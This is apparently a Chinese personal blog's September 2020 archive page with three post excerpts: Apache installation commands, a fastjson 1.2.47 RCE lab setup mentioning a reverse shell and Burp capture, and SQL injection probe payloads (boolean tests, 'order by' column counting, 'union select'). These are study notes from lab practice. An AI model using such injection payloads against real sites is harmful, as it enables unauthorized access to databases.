09 2020 档案

摘要:1、安装Apache [root@localhost ~]# yum -y install httpd # 开机自启动 [root@localhost ~]# chkconfig httpd on # 启动httpd 服务 [root@localhost ~]# service httpd star 阅读全文
posted @ 2020-09-15 23:44 任尔东西南北风 阅读(75) 评论(0) 推荐(0) 编辑
摘要:本文纯属按照某位大牛老表的文章做的,欢迎光顾。 https://www.cnblogs.com/nul1/p/12747709.html 靶场环境: 本机下开的docker: docker pull initidc/fastjson1.2.47_rce 云服务器反弹shell 本机 bp抓包 工具: 阅读全文
posted @ 2020-09-11 20:12 任尔东西南北风 阅读(246) 评论(2) 推荐(0) 编辑
摘要:整形注入 id=1 and 1=1 %23 id=1 and 1=2 %23 //判断是否整形注入 id=1 order by 3id=1 order by 4 //判断列数 id=1 and 1=2 union select 1,2,3 //判断显示位 查看所有数据库:id=1 and 1=2 u 阅读全文
posted @ 2020-09-09 20:16 任尔东西南北风 阅读(257) 评论(0) 推荐(0) 编辑

点击右上角即可分享
微信分享提示